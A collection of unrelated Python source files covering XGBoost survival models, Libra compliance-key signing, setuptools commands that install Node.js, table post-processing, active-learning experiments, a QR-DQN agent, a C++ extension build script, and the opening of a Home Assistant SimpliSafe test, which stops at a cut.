return shifted_array, time_bins
# class to fit a BCE on the leaves of a XGB
class XGBSEDebiasedBCE(XGBSEBaseEstimator):
"""
Train a set of logistic regressions on top of the leaf embedding produced by XGBoost,
each predicting survival at different user-defined discrete time windows.
The classifiers remove individuals as they are censored, with targets that are indicators
of surviving at each window.
!!! Note
* Training and scoring of logistic regression models is efficient,
being performed in parallel through joblib, so the model can scale to
hundreds of thousands or millions of samples.
* However, if many windows are used and data is large, training of
logistic regression models may become a bottleneck, taking more time
than training of the underlying XGBoost model.
Read more in [How XGBSE works](https://loft-br.github.io/xgboost-survival-embeddings/how_xgbse_works.html).
"""
def __init__(
self,
xgb_params=None,
lr_params=None,
n_jobs=-1,
):
"""
Args:
xgb_params (Dict, None): Parameters for XGBoost model.
If not passed, the following default parameters will be used:
```
DEFAULT_PARAMS = {
"objective": "survival:aft",
"eval_metric": "aft-nloglik",
"aft_loss_distribution": "normal",
"aft_loss_distribution_scale": 1,
"tree_method": "hist",
"learning_rate": 5e-2,
"max_depth": 8,
"booster": "dart",
"subsample": 0.5,
"min_child_weight": 50,
"colsample_bynode": 0.5,
}
```
Check <https://xgboost.readthedocs.io/en/latest/parameter.html> for more options.
lr_params (Dict, None): Parameters for Logistic Regression models.
If not passed, the following default parameters will be used:
```
DEFAULT_PARAMS_LR = {"C": 1e-3, "max_iter": 500}
```
Check <https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html> for more options.
n_jobs (Int): Number of CPU cores used to fit logistic regressions via joblib.
"""
if xgb_params is None:
xgb_params = DEFAULT_PARAMS
if lr_params is None:
lr_params = DEFAULT_PARAMS_LR
self.xgb_params = xgb_params
self.lr_params = lr_params
self.n_jobs = n_jobs
self.persist_train = False
self.feature_importances_ = None
def fit(
self,
X,
y,
num_boost_round=1000,
validation_data=None,
early_stopping_rounds=None,
verbose_eval=0,
persist_train=False,
index_id=None,
time_bins=None,
):
"""
Transform feature space by fitting a XGBoost model and returning its leaf indices.
Leaves are transformed and considered as dummy variables to fit multiple logistic
regression models to each evaluated time bin.
Args:
X ([pd.DataFrame, np.array]): Features to be used while fitting XGBoost model
y (structured array(numpy.bool_, numpy.number)): Binary event indicator as first field,
and time of event or time of censoring as second field.
num_boost_round (Int): Number of boosting iterations.
validation_data (Tuple): Validation data in the format of a list of tuples [(X, y)]
if user desires to use early stopping
early_stopping_rounds (Int): Activates early stopping.
Validation metric needs to improve at least once
in every **early_stopping_rounds** round(s) to continue training.
See xgboost.train documentation.
verbose_eval ([Bool, Int]): Level of verbosity. See xgboost.train documentation.
persist_train (Bool): Whether or not to persist training data to use explainability
through prototypes
index_id (pd.Index): User defined index if intended to use explainability
through prototypes
time_bins (np.array): Specified time windows to use when making survival predictions
Returns:
XGBSEDebiasedBCE: Trained XGBSEDebiasedBCE instance
"""
E_train, T_train = convert_y(y)
if time_bins is None:
time_bins = get_time_bins(T_train, E_train)
self.time_bins = time_bins
# converting data to xgb format
dtrain = convert_data_to_xgb_format(X, y, self.xgb_params["objective"])
# converting validation data to xgb format
evals = ()
if validation_data:
X_val, y_val = validation_data
dvalid = convert_data_to_xgb_format(
X_val, y_val, self.xgb_params["objective"]
)
evals = [(dvalid, "validation")]
# training XGB
self.bst = xgb.train(
self.xgb_params,
dtrain,
num_boost_round=num_boost_round,
early_stopping_rounds=early_stopping_rounds,
evals=evals,
verbose_eval=verbose_eval,
)
self.feature_importances_ = self.bst.get_score()
# predicting and encoding leaves
self.encoder = OneHotEncoder()
leaves = self.bst.predict(
dtrain, pred_leaf=True, iteration_range=(0, self.bst.best_iteration)
)
leaves_encoded = self.encoder.fit_transform(leaves)
# convert targets for using with logistic regression
self.targets, self.time_bins = _build_multi_task_targets(
E_train, T_train, self.time_bins
)
# fitting LR for several targets
self.lr_estimators_ = self._fit_all_lr(leaves_encoded, self.targets)
if persist_train:
self.persist_train = True
if index_id is None:
index_id = X.index.copy()
index_leaves = self.bst.predict(
dtrain, pred_leaf=True, iteration_range=(0, self.bst.best_iteration)
)
self.tree = BallTree(index_leaves, metric="hamming")
self.index_id = index_id
return self
def _fit_one_lr(self, leaves_encoded, target):
"""
Fits a single logistic regression to predict survival probability
at a certain time bin as target. Encoded leaves are used as features.
Args:
leaves_encoded (np.array): A tensor of one hot encoded leaves.
target (np.array): An array of time targets for a specific
Returns:
lr (sklearn.linear_model.LogisticRegression): A fitted Logistic
Regression model. This model outputs calibrated survival probabilities
on a time T.
"""
# masking
mask = target != -1
# by default we use a logistic regression
classifier = LogisticRegression(**self.lr_params)
if len(target[mask]) == 0:
# If there's no observation in a time bucket we raise an error
raise ValueError("Error: No observations in a time bucket")
elif len(np.unique(target[mask])) == 1:
# If there's only one class in a time bucket
# we create a dummy classifier that predicts that class and send a warning
warnings.warn(
"Warning: Only one class found in a time bucket", RuntimeWarning
)
classifier = DummyLogisticRegression()
classifier.fit(leaves_encoded[mask, :], target[mask])
return classifier
def _fit_all_lr(self, leaves_encoded, targets):
"""
Fits multiple Logistic Regressions to predict survival probability
for a list of time bins as target. Encoded leaves are used as features.
Args:
leaves_encoded (np.array): A tensor of one hot encoded leaves.
targets (np.array): An array of time targets for a specific time bin.
Returns:
lr_estimators (List): A list of fitted Logistic Regression models.
These models output calibrated survival probabilities for all times
in pre specified time bins.
"""
with Parallel(n_jobs=self.n_jobs) as parallel:
lr_estimators = parallel(
delayed(self._fit_one_lr)(leaves_encoded, targets[:, i])
for i in range(targets.shape[1])
)
return lr_estimators
def _predict_from_lr_list(self, lr_estimators, leaves_encoded, time_bins):
"""
Predicts survival probabilities from a list of multiple fitted
Logistic Regressions models. Encoded leaves are used as features.
Args:
lr_estimators (List): A list of fitted Logistic Regression models.
These models output calibrated survival probabilities for all times
in pre specified time bins.
leaves_encoded (np.array): A tensor of one hot encoded leaves.
time_bins (np.array): Specified time bins to split targets.
Returns:
preds (pd.DataFrame): A dataframe of estimated survival probabilities
for all times (columns), from the time_bins array, for all samples
(rows).
"""
with Parallel(n_jobs=self.n_jobs) as parallel:
preds = parallel(
delayed(m.predict_proba)(leaves_encoded) for m in lr_estimators
)
# organizing interval predictions from LRs
preds = np.array(preds)[:, :, 1].T
preds = pd.DataFrame(preds, columns=time_bins)
# converting these interval predictions
# to cumulative survival curve
return hazard_to_survival(preds)
def predict(self, X, return_interval_probs=False):
"""
Predicts survival probabilities using the XGBoost + Logistic Regression pipeline.
Args:
X (pd.DataFrame): Dataframe of features to be used as input for the
XGBoost model.
return_interval_probs (Bool): Boolean indicating if interval probabilities are
supposed to be returned. If False the cumulative survival is returned.
Default is False.
Returns:
pd.DataFrame: A dataframe of survival probabilities
for all times (columns), from a time_bins array, for all samples of X
(rows). If return_interval_probs is True, the interval probabilities are returned
instead of the cumulative survival probabilities.
"""
# converting to xgb format
d_matrix = xgb.DMatrix(X)
# getting leaves and extracting neighbors
leaves = self.bst.predict(
d_matrix, pred_leaf=True, iteration_range=(0, self.bst.best_iteration)
)
leaves_encoded = self.encoder.transform(leaves)
# predicting from logistic regression artifacts
preds_df = self._predict_from_lr_list(
self.lr_estimators_, leaves_encoded, self.time_bins
)
if return_interval_probs:
preds_df = calculate_interval_failures(preds_df)
return preds_df
|
<reponame>gdanezis/off-chain-reference
# Copyright (c) The Libra Core Contributors
# SPDX-License-Identifier: Apache-2.0
from jwcrypto.common import base64url_encode
from cryptography.exceptions import InvalidSignature
from libra import txnmetadata, utils
from jwcrypto import jwk, jws
import json
class OffChainInvalidSignature(Exception):
pass
class IncorrectInputException(Exception):
pass
class ComplianceKey:
def __init__(self, key):
''' Creates a compliance key from a JWK Ed25519 key. '''
self._key = key
def get_public(self):
return self._key.get_op_key('verify')
def get_private(self):
return self._key.get_op_key('sign')
@staticmethod
def generate():
''' Generate an Ed25519 key pair for EdDSA '''
key = jwk.JWK.generate(kty='OKP', crv='Ed25519')
return ComplianceKey(key)
@staticmethod
def from_str(data):
''' Generate a compliance key from a JWK JSON string. '''
key = jwk.JWK(**json.loads(data))
return ComplianceKey(key)
@staticmethod
def from_pub_bytes(pub_key_data):
''' Generate a compliance public key (for verification) from
32 bytes of Ed25519 key. '''
key = jwk.JWK(
kty='OKP',
crv='Ed25519',
x=base64url_encode(pub_key_data)
)
return ComplianceKey(key)
@staticmethod
def from_pem(filename, password=None):
raise NotImplementedError
#with open(filename, 'rb') as pemfile:
# return jwk.JWK.from_pem(pemfile.read(), password=password)
def to_pem(self, filename, private_key=False, password=None):
data = self._key.export_to_pem(
private_key=private_key, password=password
)
with open(filename, 'wb') as pemfile:
pemfile.write(data)
def export_pub(self):
return self._key.export_public()
def export_full(self):
return self._key.export_private()
async def sign_message(self, payload):
signer = jws.JWS(payload.encode('utf-8'))
signer.add_signature(self._key, alg='EdDSA')
sig = signer.serialize(compact=True)
return sig
async def verify_message(self, signature):
try:
verifier = jws.JWS()
verifier.deserialize(signature)
verifier.verify(self._key, alg='EdDSA')
return verifier.payload.decode("utf-8")
except jws.InvalidJWSSignature:
raise OffChainInvalidSignature(signature, "Invalid Signature")
except jws.InvalidJWSObject:
raise OffChainInvalidSignature(signature, "Invalid Format")
def thumbprint(self):
return self._key.thumbprint()
def __eq__(self, other):
if not isinstance(other, ComplianceKey):
return False
return self._key.has_private == other._key.has_private \
and self._key.thumbprint() == other._key.thumbprint()
def sign_dual_attestation_data(self, reference_id, libra_address_bytes, amount):
""" Sign the dual attestation message using the compliance key
Params:
reference_id (str)
libra_address_bytes (bytes): the 16 bytes of sender Libra Blockchain address
amount (int): a unsigned integer of transaction amount
Returns ed25519 signature bytes
"""
address = utils.account_address(bytes.hex(libra_address_bytes))
_, dual_attestation_msg = txnmetadata.travel_rule(reference_id, address, amount)
return self.get_private().sign(dual_attestation_msg)
def verify_dual_attestation_data(
self,
reference_id,
libra_address_bytes,
amount,
signature
):
"""
Verify the dual attestation message given reference id, sender libra address (bytes),
payment amount and signature
Params:
reference_id (str)
libra_address_bytes (bytes): the 16 bytes of sender Libra Blockchain address
amount (int): a unsigned integer of transaction amount
signature (bytes): ed25519 signature bytes
Returns none when verification succeeds.
Raises OffChainInvalidSignature when verification fails.
"""
address = utils.account_address(bytes.hex(libra_address_bytes))
_, dual_attestation_msg = txnmetadata.travel_rule(reference_id, address, amount)
try:
self.get_public().verify(signature, dual_attestation_msg)
except InvalidSignature:
raise OffChainInvalidSignature(
reference_id,
libra_address_bytes,
amount,
signature
)
|
'''Setuptools commands for working with node/npm'''
from distutils.core import Command
from distutils.errors import DistutilsError
import os
from pathlib import Path
import platform
import shutil
import subprocess
import sys
import tarfile
import urllib.request
import zipfile
from .util import chdir, RunnerMixin
class NodeCommand(Command):
'''Base for node related commands.
Commands may subclass NodeCommand to get the basic paths and options
setup for them.
'''
base_options = [
('node-dir=', None, 'Directory for Node install'),
('node-modules-dir=', None, 'Directory for node_modules')
]
def resolve_path(self, path):
if isinstance(path, str):
return Path(path).resolve()
return path
def resolve_binary(self):
exe = self.node_dir / 'node.exe'
binary = self.node_dir / 'bin' / 'node'
if exe.is_file():
return exe
elif binary.is_file():
return binary
def resolve_lib(self):
lib = self.node_dir / 'lib' / 'node_modules'
if not lib.is_dir():
lib = self.node_dir / 'node_modules'
return lib
def initialize_options(self):
self.base_dir = Path('.').resolve()
self.node_dir = self.base_dir / 'node'
self.node = self.resolve_binary()
self.node_lib = self.resolve_lib()
self.node_modules = self.base_dir / 'node_modules'
def finalize_options(self):
self.node_dir = self.resolve_path(self.node_dir)
self.node = self.resolve_binary()
self.node_lib = self.resolve_lib()
self.node_modules = self.resolve_path(self.node_modules)
def node_exists(self):
return self.node is not None
class NpmInstall(NodeCommand, RunnerMixin):
'''Command for installing packages with npm
By default packages will be installed with ``npm install``, if the
``--use-ci`` argument is given, ``npm ci`` will be used instead. In
addition the common options from `:py:class:NodeCommand` are supported.
Usage in setup.py::
from setuptools_node import NpmInstall
setup(cmdclass={ 'npm_install': NpmInstall })
'''
description = 'Run npm install'
user_options = NodeCommand.base_options + [
('use-ci', None, 'Use npm ci instead of npm install')
]
def initialize_options(self):
super().initialize_options()
self.use_ci = None
def finalize_options(self):
super().finalize_options()
def run(self):
npm = self.node_lib / 'npm' / 'bin' / 'npm-cli.js'
if not self.node:
self.run_setuptools_command(InstallNode)
self.finalize_options()
args = [
str(self.node.resolve()),
str(npm.resolve()),
'ci' if self.use_ci else 'install',
'--scripts-prepend-node-path'
]
res = subprocess.run(args)
if res.returncode != 0:
raise DistutilsError('Failed to run npm install')
class InstallNode(NodeCommand):
'''Command to install a local copy of node.js
Usage in setup.py::
from setuptools_node import InstallNode
setup(cmdclass={ 'install_node': InstallNode })
'''
description = 'Install a local copy of node.js'
user_options = NodeCommand.base_options + [
('node-dist-url=', None, 'Base URL to fetch Node from'),
('node-version=', None, 'Version of Node to fetch'),
('cache-dir=', None, 'Directory to cache Node distribution files')
]
def node_archive(self):
bits, _ = platform.architecture()
arch = 'x64' if bits == '64bit' else 'x86'
if sys.platform in ('win32', 'cygwin'):
node_os = 'win'
archive = 'zip'
elif sys.platform in ('linux', 'linux2') and arch == 'x64':
node_os = 'linux'
archive = 'tar.xz'
else:
raise Exception('{} {} is not supported'.format(
bits, sys.platform))
filename = 'node-{}-{}-{}.{}'.format(
self.node_version, node_os, arch, archive)
dist_url = '{}{}/{}'.format(
self.node_dist_url, self.node_version, filename)
return filename, dist_url
def initialize_options(self):
super().initialize_options()
self.node_dist_url = 'https://nodejs.org/dist/'
self.node_version = 'v12.14.1'
self.cache_dir = self.base_dir / 'cache'
def finalize_options(self):
super().finalize_options()
self.cache_dir = self.resolve_path(self.cache_dir)
def node_archive_exists(self, filename):
archive = self.cache_dir / filename
return archive.is_file()
def download_node(self, url, filename):
print('Downloading from {}'.format(url))
if not self.cache_dir.is_dir():
self.cache_dir.mkdir()
archive = self.cache_dir / filename
with urllib.request.urlopen(url) as response:
with archive.open('wb') as f:
shutil.copyfileobj(response, f)
def install_node(self, filename):
archive = self.cache_dir / filename
opener = zipfile.ZipFile if filename.endswith('.zip') else tarfile.open
with opener(archive) as f:
names = f.namelist() if hasattr(f, 'namelist') else f.getnames()
install_dir, _ = next(x for x in names if '/' in x).split('/', 1)
bad_members = [
x for x in names if x.startswith('/') or x.startswith('..')]
if bad_members:
raise Exception(
'{} appears to be malicious, bad filenames: {}'.format(
filename, bad_members))
f.extractall(self.base_dir)
with chdir(self.base_dir):
os.rename(install_dir, self.node_dir.stem)
def run(self):
if self.node_exists():
print('Using existing Node installation')
else:
print('Installing Node {}'.format(self.node_version))
archive, url = self.node_archive()
if not self.node_archive_exists(archive):
self.download_node(url, archive)
self.install_node(archive)
|
#!/usr/bin/env python3
import logging
from data.key import key as Key
import utils.match as match
import utils.model as model
import utils.logging
logger = logging.getLogger(utils.logging.getLoggerName(__name__))
def parse(output_def):
output_data_type = output_def.get("type", "list")
if output_data_type == "dict":
output = {}
else:
output = []
return output
def assign(output_def, output_data):
output_data_type = output_def.get("type", "list")
if output_data_type == "dict":
if isinstance(output_data, dict):
return output_data
if isinstance(output_data, list):
if len(output_data) > 1:
logger.warning(f"dict output specified, but input was of length {len(output_data)} (>1). Just using first.")
return output_data[0]
logger.warning(f"Could not convert output data type '{type(output_data)}' to dict")
return None
else:
return output_data
def _inherit_row_above_if_empty(proc_def, output_data):
# output_data needs to be a list
if not isinstance(output_data, list):
logger.warning(f"Cannot run post-processor 'inherit-row-above-if-empty' on output data of type '{type(output_data)}', needs to be a list")
return output_data
# Get the key to look for
if key := proc_def.get("key"):
row_above_value = ""
for row_item in output_data:
if isinstance(row_item, dict):
if key in row_item:
if isinstance(row_item[key], str):
value = row_item[key].strip()
if value == "":
# Replace value with value from row above
row_item[key] = row_above_value
else:
# We found a value for the current row, let's remember it for future rows
row_above_value = value
return output_data
def _remove_empty_rows(proc_def, output_data):
# output_data needs to be a list
if not isinstance(output_data, list):
logger.warning(f"Cannot run post-processor 'remove-empty-rows' on output data of type '{type(output_data)}', needs to be a list")
return output_data
# Get list of any columns to ignore the value of
ignore_list = []
if proc_def:
ignore_list = proc_def.get("ignore-keys", [])
def _inner_is_empty(key, value, context):
if isinstance(value, str):
if key.name not in ignore_list:
if not match.is_empty(value):
return False, False
return True, True
new_output_data = []
for row in output_data:
empty = model.recurse(row, _inner_is_empty, None)
# False will be returned if a non-empty found (we add these to the output), otherwise None will be returned if all empty
if empty is False:
new_output_data.append(row)
return new_output_data
def _value_replace(proc_def, output_data):
# output_data needs to be a str
if not isinstance(output_data, str):
logger.warning(f"Cannot run post-processor 'value_replace' on output data of type '{type(output_data)}', needs to be a string")
return output_data
# Get the key to look for
for matches in proc_def:
if match := matches.get("match"):
if replacement := matches.get("replacement"):
if output_data == match:
output_data = replacement
break # exit early on first match
return output_data
def _extract_col_name(colname:str) -> str:
"""
Extracts all data before line boudnaries and just returns that as the column header. This allows help text to be placed in the same table cell as a column header, but ignored.
"""
if not isinstance(colname, str):
return ""
return colname.splitlines()[0]
def _remove_header_row(proc_def, output_data):
"""
Removes the first row from the output data (must be a list). Assumes values are column header names and sets the 'colname' property on all descendant
Keys.
"""
# output_data needs to be a list
if not isinstance(output_data, list):
logger.warning(f"Cannot run post-processor 'remove-header-row' on output data of type '{type(output_data)}', needs to be a list")
return output_data
if len(output_data) == 0:
logger.debug(f"Cannot run post-processor 'remove-header-row' on output data of no entries")
return output_data
# Get the list of col header names
colnames = []
for colname in output_data[0].values():
# The value might not be a string, it might be a dictionary, but that dict should just have 1 entry
if isinstance(colname, str):
colnames.append(_extract_col_name(colname))
else:
if isinstance(colname, list) and len(colname) > 0:
# Look at the first entry in the list, which should be a dict
colname = colname[0]
if isinstance(colname, dict):
if len(colname.values()) == 0:
logger.warning(f"Expected 1 column name in dict '{colname}'. Setting to empty")
colnames.append("")
else:
# Table rows that aren't read in as straight values but instead are processed further, can have multiple values
#if len(colname.values()) > 1:
# logger.warning(f"Expected only 1 column name in dict '{colname}'. Using first")
colnames.append(_extract_col_name(list(colname.values())[0]))
else:
logger.warning(f"Unknown column name type of '{type(colname)}'. Setting to empty")
colnames.append("")
for row in output_data[1:]:
for rowkey, rowvalue, colname in zip(row.keys(), row.values(), colnames):
rowkey.addProperty("colname", colname)
def _set_col_name(entry):
if isinstance(entry, list):
for e in entry:
_set_col_name(e)
if isinstance(entry, dict):
for k, v in entry.items():
if isinstance(k, Key):
k.addProperty("colname", colname)
_set_col_name(v)
_set_col_name(rowvalue)
return output_data[1:]
post_processor_dispatch_table = {
"inherit-row-above-if-empty":_inherit_row_above_if_empty,
"remove-empty-rows": _remove_empty_rows,
"value-replace": _value_replace,
"remove-header-row": _remove_header_row
}
def process(output_def, output_data):
logger.debug(f'Entering: Keys {output_def.keys()}')
if output_type := output_def.get("type"):
output_data = assign(output_def, output_data)
if post_processor := output_def.get("post-processor"):
logger.debug(f'Found post-processors {post_processor.keys()}')
# Need to move through the post-processors in order specified in case order matters for processing
for proc in post_processor.keys():
if proc in post_processor_dispatch_table:
output_data = post_processor_dispatch_table[proc](post_processor[proc], output_data)
else:
logger.warning(f"Could not find post-processor '{proc}'")
logger.debug(f'Leaving: Keys {output_def.keys()}')
return output_data |
<reponame>disiji/active-assess<gh_stars>1-10
import argparse
import pathlib
import random
from collections import deque
from typing import List, Dict, Tuple, Union
from data import Dataset, SuperclassDataset
from data_utils import *
from sampling import *
import numpy as np
from tqdm import tqdm
LOG_FREQ = 10
output_dir = pathlib.Path("../output/confusion_matrix")
group_method = 'predicted_class'
random.seed(1234)
def select_and_label(dataset: 'Dataset', sample_method: str, budget: int, costs:np.ndarray, \
prior=None, weighted=False, topk:int=1) -> np.ndarray:
model = DirichletMultinomial(prior, costs, weight=dataset.weight_k)
deques = dataset.enqueue()
sample_fct = SAMPLE_CATEGORY[sample_method]
sampled_indices = np.zeros((budget,), dtype=np.int) # indices of selected data points
mpe_log = np.zeros((budget // LOG_FREQ, dataset.num_groups, dataset.num_groups))
pbar = tqdm(total=budget)
idx = 0
while idx < budget:
if sample_method == 'ts':
reward = model.reward(reward_type='confusion_matrix')
categories = sample_fct(deques=deques, reward=reward, topk=topk)
else:
categories = sample_fct(deques=deques, weighted=weighted, topk=topk)
if topk == 1 or sample_method != 'ts':
categories = [categories]
for category in categories:
selected = deques[category].pop() # a dictionary
model.update(category, selected)
sampled_indices[idx] = selected['index']
if (idx+1) % LOG_FREQ == 0:
mpe_log[idx // LOG_FREQ] = model.mpe
idx += 1
pbar.update(1)
pbar.close()
return {'sampled_indices': sampled_indices,
'mpe_log': mpe_log}
def main():
if args.superclass:
experiment_name = '%s_superclass_top%d_pseudocount%d' % (args.dataset_name, args.topk, args.pseudocount)
dataset = SuperclassDataset.load_from_text(args.dataset_name, CIFAR100_SUPERCLASS_LOOKUP)
else:
experiment_name = '%s_top%d_pseudocount%d' % (args.dataset_name, args.topk, args.pseudocount)
dataset = Dataset.load_from_text(args.dataset_name)
dataset.group(group_method = group_method)
if not (output_dir / experiment_name).is_dir():
(output_dir / experiment_name).mkdir()
budget = dataset.__len__()
costs = np.ones((dataset.num_groups, dataset.num_groups))
UNIFORM_PRIOR = np.ones((dataset.num_groups, dataset.num_groups)) / dataset.num_groups
INFORMED_PRIOR = dataset.confusion_prior
method_list = ['random_arm', 'random_data', 'random_arm_informed', 'random_data_informed', 'ts_uniform',
'ts_informed']
config_dict = {
'random_arm': [UNIFORM_PRIOR * 1e-6, 'random', False],
'random_data': [UNIFORM_PRIOR * 1e-6, 'random', True],
'random_arm_informed': [INFORMED_PRIOR * args.pseudocount, 'random', False],
'random_data_informed': [INFORMED_PRIOR * args.pseudocount, 'random', True],
'ts_uniform': [UNIFORM_PRIOR * args.pseudocount, 'ts', None],
'ts_informed': [INFORMED_PRIOR * args.pseudocount, 'ts', None]}
for r in range(args.run_start, args.run_end):
if args.superclass:
dataset = SuperclassDataset.load_from_text(args.dataset_name, CIFAR100_SUPERCLASS_LOOKUP)
else:
dataset = Dataset.load_from_text(args.dataset_name)
dataset.group(group_method = group_method)
dataset.shuffle(r)
for method_name in method_list:
prior, sample_method, weighted = config_dict[method_name]
output = select_and_label(dataset, sample_method=sample_method, budget=budget, costs=costs, \
prior=prior, weighted=weighted, topk=args.topk)
samples = output['sampled_indices'] #(budget, )
mpe_log = output['mpe_log'] #(dataset.num_groups, dataset.num_groups)
# write samples to file
np.save(open(output_dir / experiment_name / ('samples_%s_run%d.npy' % (method_name, r)), 'wb'), samples)
np.save(open(output_dir / experiment_name / ('mpe_log_%s_run%d.npy' % (method_name, r)), 'wb'), mpe_log)
return samples, mpe_log
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('dataset_name', type=str, default='cifar100')
parser.add_argument('superclass', type=str, default='False')
parser.add_argument('run_start', type=int, default=0)
parser.add_argument('run_end', type=int, default=100)
parser.add_argument('pseudocount', type=int, default=1)
parser.add_argument('topk', type=int, default=1)
args, _ = parser.parse_known_args()
args.superclass = args.superclass == 'True'
main() |
import tensorflow as tf
import collections
import random
import numpy as np
class QRDQN:
def __init__(self, sess, output_size, mainNet, targetNet, batch_size, max_length=1000000):
self.memory = collections.deque(maxlen=max_length)
self.lr = 0.00005
self.output_size = output_size
self.sess = sess
self.batch_size = batch_size
self.gamma = 0.99
self.mainNet = mainNet
self.targetNet = targetNet
self.num_support = self.mainNet.num_support
self.main_network = self.mainNet.net
self.main_action_support = self.mainNet.net
self.main_params = self.mainNet.get_trainable_variables()
self.target_network = self.targetNet.net
self.target_action_support = self.targetNet.net
self.target_params = self.targetNet.get_trainable_variables()
self.assign_ops = []
for v_old, v in zip(self.target_params, self.main_params):
self.assign_ops.append(tf.assign(v_old, v))
self.action = tf.placeholder(tf.float32, [None, self.output_size])
self.Y = tf.placeholder(tf.float32, [None, self.num_support])
self.theta_s_a = self.main_network
expand_dim_action = tf.expand_dims(self.action, -1)
theta_s_a = tf.reduce_sum(self.main_network * expand_dim_action, axis=1)
theta_loss_tile = tf.tile(tf.expand_dims(theta_s_a, axis=2), [1, 1, self.num_support])
logit_valid_tile = tf.tile(tf.expand_dims(self.Y, axis=1), [1, self.num_support, 1])
Huber_loss = tf.losses.huber_loss(logit_valid_tile, theta_loss_tile, reduction=tf.losses.Reduction.NONE)
tau = tf.reshape(tf.range(1e-10, 1, 1 / self.num_support), [1, self.num_support])
inv_tau = 1.0 - tau
tau = tf.tile(tf.expand_dims(tau, axis=1), [1, self.num_support, 1])
inv_tau = tf.tile(tf.expand_dims(inv_tau, axis=1), [1, self.num_support, 1])
error_loss = logit_valid_tile - theta_loss_tile
Loss = tf.where(tf.less(error_loss, 0.0), inv_tau * Huber_loss, tau * Huber_loss)
self.loss = tf.reduce_mean(tf.reduce_sum(tf.reduce_mean(Loss, axis=2), axis=1))
self.train_op = tf.train.AdamOptimizer(learning_rate=self.lr, epsilon=1e-2/self.batch_size).minimize(self.loss)
def train_model(self):
minibatch = random.sample(self.memory, self.batch_size)
state_stack = [mini[0] for mini in minibatch]
next_state_stack = [mini[1] for mini in minibatch]
action_stack = [mini[2] for mini in minibatch]
reward_stack = [mini[3] for mini in minibatch]
done_stack = [mini[4] for mini in minibatch]
done_stack = [int(i) for i in done_stack]
onehotaction = np.zeros([self.batch_size, self.output_size])
for i, j in zip(onehotaction, action_stack):
i[j] = 1
action_stack = np.stack(onehotaction)
Q_next_state = self.sess.run(self.target_network, feed_dict={self.targetNet.input: next_state_stack})
next_action = np.argmax(np.mean(Q_next_state, axis=2), axis=1)
Q_next_state_next_action = [Q_next_state[i, action, :] for i, action in enumerate(next_action)]
Q_next_state_next_action = np.sort(Q_next_state_next_action)
T_theta = [np.ones(self.num_support) * reward if done else reward + self.gamma * Q for reward, Q, done in
zip(reward_stack, Q_next_state_next_action, done_stack)]
_, l = self.sess.run([self.train_op, self.loss],
feed_dict={self.mainNet.input: state_stack, self.action: action_stack, self.Y: T_theta})
return l
def get_action(self, state):
Q = self.sess.run(self.main_network, feed_dict={self.mainNet.input: state})
Q_s_a = np.mean(Q, axis=2)
action = np.argmax(Q_s_a, axis=1)
return action
def update_target(self):
self.sess.run(self.assign_ops)
def append(self, state, next_state, action_one_hot, reward, done):
self.memory.append([state, next_state, action_one_hot, reward, done])
|
#
# tinremote_ext_setup.py
# A tinremote extension module build script
#
import os
#from distutils.core import setup, Extension
from setuptools import setup, find_packages, Extension
# Remove the "-Wstrict-prototypes" compiler option, which isn't valid for C++.
import distutils.sysconfig
cfg_vars = distutils.sysconfig.get_config_vars()
for key, value in cfg_vars.items():
if type(value) == str:
cfg_vars[key] = value.replace("-Wstrict-prototypes", "")
# ==================================
with_video_data = 'WITH_VIDEO_DATA' in os.environ
BIG_ENDIAN_ARCH = [ 'sparc', 'powerpc', 'ppc' ]
macro = [ ('PYRIDE_REMOTE_CLIENT', None), ('USE_ENCRYPTION', None),
('NO_AUTO_DISCOVERY', None) ]
src_code = ['RemotePyModule.cpp', 'RemoteDataHandler.cpp', '../pyride_core/PyRideNetComm.cpp',
'../pyride_core/ConsoleDataProcessor.cpp', '../pyride_core/PyRideCommon.cpp']
inc_dirs = ['../pyride_core']
lib = []
link_args = []
lib_dirs = []
if with_video_data:
macro.append(('WITH_VIDEO_DATA', None))
src_code = src_code + ['VideoStreamController.cpp', '../pyride_core/RTPDataReceiver.cpp']
osname = os.name
if osname == 'nt':
macro = macro + [('WIN32', None), ('WIN32_LEAN_AND_MEAN', None), ('NO_WINCOM', None)]
lib = ['ws2_32', 'Kernel32', 'libeay32', 'advapi32', 'oleaut32', 'user32', 'gdi32', # 'legacy_stdio_definitions',
'ucrt', 'vcruntime']
inc_dirs = inc_dirs + ['../Windows/include']
lib_dirs = ['../Windows/lib/release']
link_args = []
if with_video_data:
macro = macro + [('CCXX_STATIC', None), ('CCXX_NAMESPACES', None)]
lib = lib + ['ccext2', 'ccrtp1', 'ccgnu2', 'jpeg-static' ]
elif osname == 'posix':
if with_video_data:
lib = ['pthread', 'ccext2', 'ccrtp1', 'ccgnu2', 'crypto', 'jpeg']
#lib = ['pthread', 'ucommon', 'commoncpp', 'ccrtp', 'crypto', 'jpeg'] #14.04 or later
else:
lib = ['pthread']
f = os.popen('uname -ms')
(myos, myarch) = f.readline().split(' ')
f.close()
if myos == 'Darwin' or myos.endswith( 'BSD' ):
macro.append(('BSD_COMPAT', None))
inc_dirs.append( '/usr/local/opt/openssl/include' )
lib_dirs.append( '/usr/local/opt/openssl/lib' )
elif myos == 'SunOS':
macro.append(('SOLARIS', None))
for arch in BIG_ENDIAN_ARCH:
if arch in myarch:
macro.append(('WITH_BIG_ENDIAN', None))
break
else:
print "unknow platform. quit"
exit( -1 )
module1 = Extension('pyride_remote',
define_macros = macro,
include_dirs = inc_dirs,
library_dirs = lib_dirs,
libraries = lib,
extra_link_args = link_args,
sources = src_code)
setup (name = 'pyride_remote',
version = '0.1.0',
description = 'This is a Python client extension module for PyRIDE.',
url = 'https://github.com/uts-magic-lab/pyride_clients',
author = '<NAME>',
author_email = '<EMAIL>',
license = 'MIT',
platforms = 'Linux, OS X, Windows',
ext_modules = [module1])
|
"""Define tests for the SimpliSafe config flow."""
from simplipy.errors import (
InvalidCredentialsError,
PendingAuthorizationError,
SimplipyError,
)
from homeassistant import data_entry_flow
from homeassistant.components.simplisafe import DOMAIN
from homeassistant.config_entries import SOURCE_IMPORT, SOURCE_USER
from homeassistant.const import CONF_CODE, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from tests.async_mock import MagicMock, PropertyMock, patch
from tests.common import MockConfigEntry
def mock_api():
"""Mock SimpliSafe API class."""
api = MagicMock()
type(api).refresh_token = PropertyMock(return_value="<PASSWORD>")
return api
async def test_duplicate_error(hass):
"""Test that errors are shown when duplicates are added."""
conf = {
CONF_USERNAME: "<EMAIL>",
